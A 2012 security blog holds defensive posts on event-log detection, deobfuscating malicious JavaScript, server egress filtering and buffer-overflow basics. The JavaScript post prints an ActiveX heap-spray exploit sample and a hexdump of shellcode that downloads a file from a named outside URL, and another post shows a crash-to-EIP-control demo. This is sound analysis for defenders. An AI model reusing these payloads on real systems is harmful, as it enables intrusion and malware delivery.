Thursday, November 22, 2012

Identifying Compromise with the Windows Event Log

Windows event logs are primarily viewed as a means to confirm a compromise and explore its depth and breadth. Typically, only after having been alerted by IDS, HIDS, or AV will an incident responder examine host event logs. Until recent changes in Vista & Server 2K8, this information could be seen as unmanageable and unruly. Today, I'm advocating for the use of Windows Event Logs as a source for initial identification of security incidents, instead of an afterthought.

Detecting Persistence
I'm part of a team whose role is to perform penetration tests and design mitigation strategies based on our ability to break in, persist, and move laterally. Most of the time, when we land on a machine inside of the target network, we utilize some form of persistence mechanism:

  1. Add a registry setting to HKLM/.../Run or RunOnce
  2. Attempt to create a service which runs our trojan
  3. Add a task in TaskScheduler to execute our trojan
  4. Open the Windows Firewall, enable Remote Desktop/ Remote Assistance, and add a user
  5. Copy our trojan into the "Auto-Start" directory
Let's take a moment and analyse how each of the above actions is captured in the Windows Event Logs (thank you Randy Franklin):
  1. Event 4657: Registry Changes
  2. Event 4697: Service installed on a system
  3. Event 4698: A Scheduled Task was created
  4. Event 4946: Firewall Exception Added, Event 4720: User Created
  5. Event 4657: This action will trigger registry changes in the Run hive
Now, let's not get carried away! I mean, Windows registry changes happen A LOT on end user workstations. Looking at all of the registry changes as potential compromises would be like documenting each port scan of your external IP space - not helpful. With this in mind, we need to filter for changes to specific hives which should generally remain static. We can also watch out for changes to any of the hives examined by "AutoRuns.exe"; a tool created by Mark Russinovich to identify persistent applications in Windows. 
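
To make the filtering idea concrete, here is a minimal Python sketch. It assumes the events have already been collected and parsed into dictionaries, and that each record exposes an "EventID" field and (for 4657) an "ObjectName" field holding the registry key path. Those field names and the helper names are my assumptions for illustration, not the output of any particular collection tool. It covers the registry, service, scheduled task, and user-creation IDs from the list above.

```python
# Event IDs from the list above, mapped to a short description.
WATCHED_EVENTS = {
    4657: "registry value modified",
    4697: "service installed",
    4698: "scheduled task created",
    4720: "user account created",
}

# Assumption: 4657 records carry the key path in an "ObjectName" field.
# The substring below matches both ...\Run and ...\RunOnce.
RUN_KEY_MARKER = r"\currentversion\run"


def is_persistence_candidate(event: dict) -> bool:
    """Return True if the event is worth a closer look for persistence."""
    event_id = event.get("EventID")
    if event_id not in WATCHED_EVENTS:
        return False
    if event_id == 4657:
        # Registry changes are noisy, so keep only the Run/RunOnce keys.
        return RUN_KEY_MARKER in event.get("ObjectName", "").lower()
    return True


def triage(events):
    """Filter a list of parsed events down to the persistence candidates."""
    return [e for e in events if is_persistence_candidate(e)]
```

The list of watched keys would need to grow to cover the other locations AutoRuns inspects; the point is only that registry events get filtered by key while the rarer events are kept outright.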

Getting the Logs Together
Let's talk about the bigger challenge: collecting events from EACH workstation in a domain into a central location. There are a few approaches that would work, some more scalable than others. Your organization's bottom line will dictate what type of solution you can implement, but just collecting key events centrally is a step in the right direction. If your organization has hardware sitting around, you can implement the first 2 solutions for free (plus labor):

  • Powershell or WMI: pull specific events
    • Easy, quick, could provide spotty data depending on pull frequency
  • Event Log Forwarding: push events to central log management device
    • Built into Windows, manageable via GPO, almost real-time, encryptable
  • Splunk or Snare agent: push events to central log management device
    • Optimal, real-time, encryptable, relatively expensive 

Not Just for Persistence!
Other uses of event logs include, but are not limited to:
  • Suspicious Share usage (think pass-the-hash/psexec.exe)
  • Local administrative account creation
  • Local administrator brute force attempts
  • Use of "net" tools on non-network admin boxes
  • Suspicious internal RDP sessions

Log management is certainly not a catch-all. Attackers can and will find ways to compromise networks that will go undetected by event log monitoring. Event log monitoring should be viewed as an essential compromise detection component of a defense-in-depth approach to network security. That being said, for an attacker to persist on a Windows machine, it is extremely likely that they will trigger an event listed above.

Thursday, November 15, 2012

Malicious JavaScript

Often times, malware enters your network through your clients.  One of the most prevalent attack vectors is through browser vulnerabilities.  These are usually manifested in malicious JavaScript that either redirects the browser to a malicious website hosting exploit code or is an exploit itself.  The Blackhole Exploit Kit has been making the news and flooding non-malicious but exploitable websites with redirect code through obfuscated JavaScript that will cause your web browser to be redirected through a series of other websites that determine your software versions and serve you the appropriate exploit for your system.  This is all automated and can be deployed by non-technical attackers.

But what does "obfuscated" really mean?  For me, if I can't tell just by looking at it what it is trying to do, then it is obfuscated.  As a network defender, I've encountered my share of obfuscated JavaScript.  It is important to note that there are legitimate reasons for having obfuscated JavaScript on your website (saving bandwidth, hiding proprietary code, etc).  This post aims to highlight the key differences between legitimate, redirecting and malicious obfuscated JavaScript code and demonstrate quick ways to analyze and ferret out what is what.

There is no real substitute to experience.  If you are looking at obfuscated JavaScript and you are a network defender, your first instinct is to distrust it.  Over time, the legitimacy of the code will stand out and the unusual ones will become more and more obvious.  But, we can start with the easy ones.

Yahoo and Google make up a lot of the JavaScript code out there.  jQuery, undoubtedly one of the more popular JavaScript frameworks, is served straight from Google.  Sure, some websites download a particular version and host it for their own use, but the smart website coder would rather point to Google's hosting of jQuery for a number of reasons, saving bandwidth and automatic updating among them.  Yahoo also serves up several JavaScript frameworks, including the Yahoo User Interface (YUI).  JavaScript that is served by Yahoo and Google can generally be trusted.  After reviewing several samples over the wire, it becomes easy to see the patterns.

But it is important to know that exploit kits such as the Blackhole Exploit Kit (BEK) automatically add their malicious code to multiple files on vulnerable websites.  BEK code tends to stick out since it does not match the general pattern of other JavaScript frameworks.  It tends to consume only a few, albeit long, lines of code and usually has a large amount of what appear to be meaningless numbers or letters followed by a decoding sequence.  I've seen my share of YUI and jQuery libraries with BEK JavaScript code appended or pre-pended to them.

In short, trust some sources, but not the frameworks.

JavaScript that redirects will usually go through several layers of obfuscation.  The structure generally tends to look like this:

Some testing code
Large array of numbers or letters
De-obfuscation loops
Execution code

The last line, execution code, describes JavaScript execution, such as "eval" or some obfuscated version of it.  As with legitimate code, over time, you can easily identify redirecting code based on the structure and the layouts.
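
As a rough illustration of that structure, here is a small Python sketch that checks a script for three of the pieces: a large array of numbers, a decoding routine, and an execution call.  The thresholds, the regular expressions and the function name are my own assumptions, and a plain-text check like this will miss an "eval" that has itself been disguised.  Treat it as a triage aid, not a detector.

```python
import re

# Assumption: 50+ comma-separated numbers in a row counts as a "large array".
LONG_NUMBER_RUN = re.compile(r"(?:\d+\s*,\s*){50,}")
# Common building blocks of de-obfuscation loops.
DECODER_HINT = re.compile(r"fromCharCode|unescape|parseInt")
# A direct, undisguised call to eval.
EXECUTION_HINT = re.compile(r"\beval\s*\(")


def obfuscation_indicators(script: str) -> dict:
    """Report which structural pieces of a redirect script are present."""
    return {
        "large_number_array": bool(LONG_NUMBER_RUN.search(script)),
        "decoder": bool(DECODER_HINT.search(script)),
        "execution": bool(EXECUTION_HINT.search(script)),
    }
```

A script that trips all three deserves a closer look; a minified but legitimate library will often trip none or only one.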

Consider this bit of code that was appended to the end of an otherwise legit copy of the jQuery JavaScript library v1.4.4:


JavaScript exploits are usually Heap Spray attacks.  They throw the payload all over the heap and then exploit the vulnerable components of JavaScript, hoping to change EIP to their exploit code and thus executing the payload.  There are a couple of things about JavaScript exploits that tend to stick out: they use NOPs (see below) and cannot obfuscate the payload.  Note that this does not mean the code is not obfuscated.  It may go through several iterations before actually attempting to render the payload in memory, but when it is rendered, it cannot be obfuscated itself.  In other words, it will stick out.  

NOP (No OPeration) is an assembly command that does nothing.  If an attacker has placed their payload, which contains assembly commands, in memory, but is not sure exactly where it is in memory, they may pad the beginning of the payload with NOP commands (0x90) so if the instruction pointer (EIP) is changed to the general location, the target system will execute NOP commands until it hits the main payload.  This increases the chances of the payload being executed, especially if the attacker is not sure where the exploit code is in memory, as is the case with Heap Spray attacks.

Here is an example of a malicious JavaScript with a payload, attempting to exploit a vulnerable ActiveX component:

function second()
{
        var yuwergufiudf = 0x0F0F0F0F;
        var vhusdifsdifdbwfbsdf = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u54EB
        var uyywifssdfdsf = 0x400000;
        var afddssddsfsdfxc = vhusdifsdifdbwfbsdf.length * 2;
        var erwfrhhrhfgSize = uyywifssdfdsf - (afddssddsfsdfxc+0x38);
        var erwfrhhrhfg = unescape("%u0D0D%u0D0D");
        erwfrhhrhfg = retyttyuty(erwfrhhrhfg,erwfrhhrhfgSize);
        iusdiuiudfsd = (yuwergufiudf - 0x400000)/uyywifssdfdsf;
        memory = new Array();
        for (i=0;i<iusdiuiudfsd;i++)
                memory[i] = erwfrhhrhfg + vhusdifsdifdbwfbsdf;
        var target = new ActiveXObject("DirectAnimation.PathControl");
        target.KeyFrame(0x40000E0A, new Array(1), new Array(1));
}

The lovely thing about scripting languages is that they execute regardless of the environment.  Unlike executable malware analysis, you can take JavaScript code and run it in any environment and it will run, as long as certain dependencies are met.  Luckily, there are a lot of tools available for doing just this.  One of my favorites is called Malzilla.  Malzilla is a Windows-based tool that can not only execute JavaScript, it can also re-format, debug and analyze the resulting "stuff" that it generates.

Let's take the first example above of redirecting JavaScript.  First, we fire up Malzilla and paste the code into the "Decoder" tab of Malzilla.  Ensure that the "Replace eval() with" is selected and then hit the "Format Code" button.  This will give us something more readable.



We can do a quick review of the code in this script and identify the logic structures.  The "if" statement starting on the third line will execute only if it is in a browser environment, and it also does a little math test as an additional check.  The "for" loop at the bottom is a decoding loop, building the variable "s".  The second to last line copies "s" into the "z" variable, and the last line is actually an "eval" against "z".  To find out what this code is really trying to do, we can change that last "eval" to a "document.write":



When we run this, we find code that will redirect the web browser to http[:]//", which when this code was captured was a starting point for a Blackhole Exploit Kit (BEK) attack.

Now, let's look at the second example we have: a direct JavaScript exploit.  Remember, these exploits can come with multiple obfuscations, but the final attack payload cannot be obfuscated.  I've seen JavaScript attacks that go through multiple rounds of obfuscations before revealing the final payload and attack.  So you may need to rinse and repeat until you get to the bottom of a JavaScript attack.

In the example above, we can quickly identify the payload since it begins with a NOP sled: "%u9090%u9090" and completely ignore the rest of the script.  A quick Google of "DirectAnimation.PathControl" shows that this is most likely an exploit against CVE-2006-4446 (sorry, this is an old sample).  But let's focus on the payload to figure out what an infected system would do:


For this, we can use a variety of tools or even scripting.  The key point to remember is that this is machine code and is intended to be run directly in memory by redirecting EIP to the NOP sled in the beginning and then executing the rest of the instructions.  Another thing to remember is that JavaScript's %u escapes encode 16-bit values that land in memory least significant byte first (little-endian), which for our purposes means that we swap the bytes in each pair (i.e. change u3574 to u7435).  You can do this in your favorite scripting language.  You can also use Malzilla's "Misc Decoders" tab for this.  Me, I like awk, so I do sloppy things like this with the payload (after removing the unescape wrapper):

awk 'gsub("%u"," ") { x=1; while(x<=NF) { printf "0x" substr($x,3,2) ",0x" substr($x,1,2) ","; x++; } }'

In any case, you should have something like this in the end:


Now, you can convert the hex strings to binary in any number of ways.  Here's a quick way to do this with xxd and hexdump (assuming you have the above text in file /tmp/payload.hex):

xxd -r -ps /tmp/payload.hex | hexdump -Cv

The output should look like this:

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000010  90 90 90 90 eb 54 8b 75  3c 8b 74 35 78 03 f5 56  |.....T.u<.t5x..V|
00000020  8b 76 20 03 f5 33 c9 49  41 ad 33 db 36 0f be 14  |.v ..3.IA.3.6...|
00000030  28 38 f2 74 08 c1 cb 0d  03 da 40 eb ef 3b df 75  |(8.t......@..;.u|
00000040  e7 5e 8b 5e 24 03 dd 66  8b 0c 4b 8b 5e 1c 03 dd  |.^.^$..f..K.^...|
00000050  8b 04 8b 03 c5 c3 75 72  6c 6d 6f 6e 2e 64 6c 6c  |......urlmon.dll|
00000060  00 43 3a 5c 55 2e 65 78  65 00 33 c0 64 03 40 30  |.C:\U.exe.3.d.@0|
00000070  78 0c 8b 40 0c 8b 70 1c  ad 8b 40 08 eb 09 8b 40  |x..@..p...@....@|
00000080  34 8d 40 7c 8b 40 3c 95  bf 8e 4e 0e ec e8 84 ff  |4.@|.@<...N.....|
00000090  ff ff 83 ec 04 83 2c 24  3c ff d0 95 50 bf 36 1a  |......,$<...P.6.|
000000a0  2f 70 e8 6f ff ff ff 8b  54 24 fc 8d 52 ba 33 db  |/p.o....T$..R.3.|
000000b0  53 53 52 eb 24 53 ff d0  5d bf 98 fe 8a 0e e8 53  |SSR.$S..]......S|
000000c0  ff ff ff 83 ec 04 83 2c  24 62 ff d0 bf 7e d8 e2  |.......,$b...~..|
000000d0  73 e8 40 ff ff ff 52 ff  d0 e8 d7 ff ff ff 68 74  |s.@...R.......ht|
000000e0  74 70 3a 2f 2f 6d 70 33  2e 72 65 61 6c 69 7a 65  |tp://mp3.realize|
000000f0  2e 68 6b 2f 6c 6f 67 69  6e 2f 69 6e 64 65 78 2e  |.hk/login/index.|
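
If awk and xxd are not your thing, the same byte swap and string hunt can be sketched in a few lines of Python.  This is just one way to do it; the function names are mine, and the input is assumed to be the %u-escaped text with the unescape wrapper already removed.

```python
import re


def decode_percent_u(escaped: str) -> bytes:
    """Turn %uXXXX escapes into raw bytes, least significant byte first."""
    out = bytearray()
    for word in re.findall(r"%u([0-9A-Fa-f]{4})", escaped):
        # %u54EB becomes the bytes EB 54, matching the hexdump above.
        out += int(word, 16).to_bytes(2, "little")
    return bytes(out)


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Pull out runs of printable ASCII, like the Unix strings tool."""
    pattern = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}")
    return [m.group().decode("ascii") for m in pattern.finditer(data)]
```

Running printable_strings over the decoded payload is a quick way to surface DLL names, file paths and URLs without reading the disassembly.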

After examining the output, regardless of how you do it, we find the following strings, including a URL that is used for a secondary download: 
  • urlmon.dll
  • C:\U.exe
  • http[:]//

When you can quickly produce these types of results for your network defenders, it goes a long way toward detecting and preventing infections on your network.

Thanks for reading and hopefully you've found this post informative.  If there are topics you would like to see in the future, please drop us a line.

Thursday, November 8, 2012

Restricting Server Internet Access

It should be a no-brainer not to do this, but you'd be amazed at how many different environments I've worked in where the security/networking staff would allow their servers to talk outbound using HTTP/HTTPS.  While there are some occasions where this is necessary, it should certainly be limited to only the critical functions and requisite URLs/IP addresses.  Allowing servers to access the Internet can have potentially dangerous consequences resulting in loss of data confidentiality, integrity and availability. 

Circumstances where a server might need to get out to the Internet include anti-virus updates, operating system patches and third-party application updates such as from Adobe or Java.  These processes should be configured to funnel their traffic through "bridgehead servers" that function for this purpose.  Microsoft provides WSUS (Windows Server Update Services) that can be used as a centralized point for providing updates not only to your clients, but your servers as well.  Additionally, McAfee, Symantec, and the other AV vendors generally provide the ability to allow just one device to go to the Internet and get the updates for distribution amongst the rest of your environment.  While this provides efficiency and in some cases a centralized reporting structure for your client devices, it should be viewed as a necessity for servers.  So, use your proxy server or your firewall to only allow the connections from the boxes that are acting as bridgeheads to the corresponding service provider on the Internet and be done with it.  While it is not impossible for Microsoft or any of the others to be compromised, the chances are pretty low and it is a risk worth taking.
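
The rule itself is simple enough to write down.  Here is a minimal Python sketch of the decision a proxy or firewall would be making; the IP addresses and hostnames are made up for illustration, and a real deployment would express this in the device's own rule language rather than in a script.

```python
# Hypothetical bridgehead servers and the only destinations each may reach.
BRIDGEHEAD_RULES = {
    "10.0.5.10": {"windowsupdate.example"},  # WSUS box (made-up address)
    "10.0.5.11": {"av-updates.example"},     # AV update box (made-up address)
}


def outbound_allowed(source_ip: str, destination_host: str) -> bool:
    """Default deny: only a bridgehead talking to its own vendor gets out."""
    allowed = BRIDGEHEAD_RULES.get(source_ip, set())
    return destination_host.lower() in allowed
```

Every other server in the farm falls through to the default deny, which is exactly the behavior we want.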

As I've mentioned in my previous posts, it is critical that we as network/security engineers try to eliminate as much unneeded traffic as possible, thus providing ourselves the ability to more closely examine the traffic that is allowed.  Also, getting back to the point of servers specifically, with bridgehead servers for critical update functions, we can deny all outbound web traffic from our server farm, thus potentially eliminating any C2 channels. If you have a Blue Coat or other brand of web filtering proxy, you can even use the built-in categories or create your own that can include the necessary sites to allow our software to remain updated.  Additionally, it will prevent administrators from surfing the web from servers.  Again, it was amazing to see environments where system admins would log in to servers and check their webmail or go to any number of sites that they should not be viewing from a server.  Chances are when logged onto servers, the account will have elevated credentials, thus giving any infection a more significant impact.  With no ability to get to the Internet, the server is better protected against infection and if somehow infected has a decreased likelihood of allowing C2 to an attacker, both effects we should strive for as security professionals.

Thursday, November 1, 2012

Regarding Buffer Overflows

In the network security world, vulnerabilities and exploits are currency.  Without vulnerabilities, there would be no exploits.  Without exploits, there would be no network attacks.  Exploits can come in many forms and recently, the user has been the vulnerability: poor password security, phishing emails and other social engineering attacks have become more prevalent.  This is due to hardened network defenses, increased patching and the general lack of new exploitable software vulnerabilities.  Years ago, a system could be taken over by simply sending a network packet or two to the target system from halfway around the world.  But how did that happen?  What is different now?  

Today, there is more awareness of Buffer Overflows in the development world.  This, along with technical enhancements such as Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR) and Stack Canaries (that shut down programs that misbehave), limits the impact of this vulnerability.  But there are always workarounds and it is essentially an arms race between the attackers and defenders.  Fundamentally, Buffer Overflows are still a problem, but exploiting them is not as easy as it once was.

This post aims to describe Buffer Overflow vulnerabilities in simple terms as well as provide a real world example.  It's not an easy task, mainly because of the technical details, but let's try anyway.

An overflow is what it sounds like: too much of something that doesn't fit in a container will overflow.  In programming terms, these are typically stack overflows or heap overflows.  The main difference is where in memory this overflow happens.  When a program needs to take in information, it allocates memory of a size that the programmer has specified and attempts to write data to that memory space.  If the amount of data written is larger than the space provided, an overflow occurs.  When this happens, other parts of memory are overwritten, which may or may not cause problems, but typically they will overwrite something important, causing memory corruption.  When the running program tries to read from that part of memory, it usually crashes.  

An attacker, after discovering that a program has a buffer overflow problem, can customize the data corruption in an attempt to control the crash.  Controlling the crash will allow the attacker to control the system.

How does an attacker control the crash?  By controlling EIP.  To illustrate this, we will demonstrate a stack buffer overflow with a simple, imaginary program:

C:\TEMP>hello.exe Mike
Hi there, Mike!

The imaginary program above, when run, will print out the words "Hi there, " followed by whatever was given as an argument to the program.  In this case, the name "Mike".  This is then followed by an exclamation point and a new line.  The program then exits.

The program looks like this at an extremely high level:

Create Name Variable (4 bytes);
Read Name from Command Line;
Print "Hi there, " + Name + "!\n";

When the program starts, it will allocate memory space for the Name variable.  In our example, let's say it allocates 4 bytes.  If we then provide a longer name like "Emily", with 5 characters, when the program reads "Emily" and tries to put it into the Name variable, we have an overflow.  Then we may get a nice little program crash. (For the purposes of this post, I won't go into details like the NULL or CRLF characters at the end of the input string).

Even a simple program like above will use almost 50 lines of CPU instructions.  Any function calls, like the Print command, can easily add to the number of instructions that a program needs.  You can imagine how many instructions are needed for more useful programs.  Luckily, today's processors can execute hundreds of billions of instructions a second, although even those seem slow at times.  

So where does EIP come in?  EIP is a special piece of storage inside the CPU, called a register, that contains the memory address of the next instruction to execute.  After an instruction executes, EIP is changed to the memory address of the next instruction to run.  Essentially, EIP is where the CPU looks for the next thing to do.

There is another part of memory called the "stack."  This is where programs can store temporary information for use later (like "Mike" or "Emily").  In the example above, the second instruction uses a function to read user input into the Name variable.  In this case, let's pretend that the function used to write to the name variable is "strcpy" (a common function to copy strings - String Copy), which has its instructions in memory address 0x08048.  When the CPU gets to this part of the program, it will call that function using a jump (JMP) instruction.  But before it does that, it copies the address of the next instruction into the stack so it knows where to go back to when it's done (on real x86 hardware, a single CALL instruction performs both steps).  So at a high level, this program looks like:

0x00001: Create Name
0x00005: strcpy (0x08048) Name from Command Line
0x00008: Print (printf, located at 0x080a9) "Hi there," + Name + "!\n"
0x0000a: exit

When our hello.exe program runs, the CPU executes the instructions at memory address 0x00001.  The next line of code is at memory address 0x00005.  The CPU then changes EIP to 0x00005. Then 0x00005 is executed, but since it points to another memory location outside of the normal execution, the address 0x00008 is written to the stack as a sort of bookmark for where to go back to when the strcpy function is completed.  The command "JMP 0x08048" is then executed.  EIP is changed to 0x08048.  Execution begins at 0x08048 until it is done.  When it is complete, the CPU instruction "RET" (short for return) is executed.  This tells the CPU to take the last value written to the stack, in this case 0x00008 and then copy that to EIP.  The CPU then continues execution from 0x00008.

Command execution is then:

0x00005 (JMP to 0x08048, copy 0x00008 to the stack)
RET (copy top of stack (0x00008) to EIP)
0x00008 (JMP to 0x080a9, copy 0x0000a to the stack)
RET (copy top of stack (0x0000a) to EIP)
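
For those who prefer to see the bookkeeping spelled out, here is a toy Python model of the same flow.  It uses the made-up addresses from this post and collapses each function body into a single RET; the table layout and the function name are my own simplifications, not how a real CPU is built.

```python
# address -> (kind, jump target, address of the following instruction)
PROGRAM = {
    0x00001: ("step", None, 0x00005),     # Create Name
    0x00005: ("call", 0x08048, 0x00008),  # strcpy
    0x00008: ("call", 0x080a9, 0x0000a),  # printf
    0x0000a: ("exit", None, None),
    0x08048: ("ret", None, None),         # strcpy body collapsed to RET
    0x080a9: ("ret", None, None),         # printf body collapsed to RET
}


def trace_execution(start=0x00001):
    """Follow EIP through the toy program and return every address visited."""
    eip, stack, visited = start, [], []
    while True:
        visited.append(eip)
        kind, target, following = PROGRAM[eip]
        if kind == "exit":
            return visited
        if kind == "call":
            stack.append(following)  # bookmark where to come back to
            eip = target
        elif kind == "ret":
            eip = stack.pop()        # copy the bookmark back into EIP
        else:
            eip = following
```

The important detail is that RET blindly trusts whatever value is on top of the stack.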

In our example, we used "Emily" as the Name.  Now, since the Name only has 4 bytes, when "Emily" is written to memory, the last letter "y" (0x79) is written past the 4 bytes.  What is past the 4 bytes?  Who knows?  No one really, at first.  But one thing about computers is that they are consistent.  The memory structures are the same every time a program is run.  If the overflow goes into the area of the stack where something important is written, say the address to return to (0x00008), when the strcpy function is done and RET is executed, the CPU will try to copy 0x00008 into EIP, except in this case, it's been changed to 0x79008.  The CPU will copy that into EIP and then try to execute the instructions at 0x79008, which is likely garbage and the CPU will error out with "illegal instruction at 0x79008."
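
Here is a small Python simulation of that overwrite.  It assumes a toy layout of my own choosing: a 4-byte Name buffer immediately followed by a 4-byte saved return address stored least significant byte first.  Because that layout is not the same as the illustrative addresses used in this post, the corrupted value it produces is different too; the mechanism is what matters.

```python
import struct

NAME_SIZE = 4  # bytes reserved for Name, as in the example


def make_frame(return_address: int) -> bytearray:
    """Toy stack frame: Name buffer first, saved return address right after."""
    return bytearray(NAME_SIZE) + bytearray(struct.pack("<I", return_address))


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy data into the frame with no length check, like an unsafe strcpy."""
    frame[0:len(data)] = data


def saved_return_address(frame: bytearray) -> int:
    """Read back the value that RET would copy into EIP."""
    return struct.unpack_from("<I", frame, NAME_SIZE)[0]


frame = make_frame(0x00000008)
unchecked_copy(frame, b"Emily")
# "Emil" fills the buffer; "y" (0x79) lands on the first byte of the bookmark.
corrupted = saved_return_address(frame)
```

With "Mike" the bookmark survives untouched; with "Emily" it no longer points back into the program.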

On the next run, an attacker could then simply change "Emily" into different values that mean something, causing EIP to point to a part of memory the attacker controls.  Remember that an overflow is continuously written to memory.  If we used a very long name instead of Emily, the name we chose will be in memory.  Whole swaths of memory will be overwritten.  Since the attacker can now control EIP, they can simply change it to the memory address of instructions other than the normal ones, and at that point the attacker owns your system.

If you want to see this in the real world, fire up an old Windows XP system.  There is a command line program built-in called "netsetup.exe".  If you have a newer system, you can still try this, but it's been patched sometime since Windows XP, so your mileage will vary.  In any case, it's still worth seeing the process in action.  Note that Windows 7 does not have netsetup.exe.

Step 1: Open a command line prompt by running "cmd.exe"
Step 2: Run the program netsetup.exe (it's in the PATH, so you can run it from anywhere).
Step 3: Give netsetup.exe an argument of AAAA:

C:\TEMP>netsetup.exe AAAA

You will get a box that says "Command Line Syntax Error"

Step 4: Add more AAAAs until you get a program crash (hint: it starts to crash at 271 characters).  


If you examine the technical details of the crash, you should find that one of the registers (Windows calls it "P7") has a value of 41414141.  A capital "A" has a hex value of 0x41.  What you are seeing is EIP with a value of 0x41414141, which caused the program to crash because it tried to execute instructions at that memory address.  If you change the letters at the end of your 271 characters to say ABCD, you will see P7 change to something like 44434241.  You are now controlling EIP.
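
The reason ABCD shows up as 44434241 rather than 41424344 is byte order: x86 stores the least significant byte first.  A quick Python check, using a helper name I made up:

```python
import struct


def register_value(last_four: str) -> str:
    """Show how four ASCII characters read back as a 32-bit x86 register."""
    value = struct.unpack("<I", last_four.encode("ascii"))[0]
    return format(value, "08X")
```

So register_value("AAAA") gives 41414141 and register_value("ABCD") gives 44434241, matching what the crash dialog reports.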

At this point, one could then fire up a debugger and examine memory when the program crashes and find out where the rest of the "AAAAAA"s went in memory, attempt to change the "AAAAAA"s to actual instructions and then modify the last part to point to where the attacker's instructions are in memory.  

The series of characters that make up the attacker's instructions (usually minimal code to give the attacker some level of control) is called the payload.  The coding problem of netsetup.exe that allows memory to be overwritten is called a vulnerability.  If the attacker can actually run their own code against this vulnerability, this would be an exploitable vulnerability.  If not and all they can do is crash the program, it's still a vulnerability but not exploitable.

Since netsetup.exe is a really old program, this is not really a vulnerability disclosure.  I do not know if netsetup is fully exploitable or not.  This would require local execution since netsetup.exe is not a networked program and the input to the program comes from the command line.  But the process for finding vulnerabilities in network-aware programs is the same: keep feeding it garbage and wait for it to crash.  When it crashes, examine memory and see if there is some kind of overflow involved and if, as an attacker, you can craft input to the program via network packets that would give you control of EIP.  "Fuzzing" programs automate a lot of this manual process by heaping varying amounts and types of data at a program and then recording the crashes.  Vulnerability hunters generally write their own fuzzers to help with this.  Finally, it is important to point out that these are really simple examples.  There is a lot more involved in vulnerability hunting and exploitation, but this is the gist of it.
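
To give a feel for what the simplest possible fuzzer does, here is a Python sketch that automates the "add more AAAAs until it crashes" step.  The target is a hypothetical stand-in function, not netsetup.exe, and its 270-character limit is an assumption I picked to echo the hint above; a real fuzzer would launch the actual program and watch for it to die.

```python
def toy_target(data: bytes) -> None:
    """Hypothetical stand-in for a program with a fixed-size input buffer."""
    limit = 270  # assumed buffer size, chosen only for illustration
    if len(data) > limit:
        raise MemoryError("simulated crash")


def find_crash_length(target, max_length: int = 1024):
    """Feed ever longer runs of 'A' and report the first length that crashes."""
    for length in range(1, max_length + 1):
        try:
            target(b"A" * length)
        except Exception:
            return length  # record the crash and stop
    return None  # no crash within max_length
```

Real fuzzers vary the type of data as well as the amount, but the loop of generating input, running the target, and recording crashes is the same.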

Hopefully this gives some clarity to some of the terms that are thrown around in the network security world as opposed to adding to the confusion.  In future posts, we'll examine process spawning and the different types of exploits (local, remote, privilege escalation).  Thanks for reading!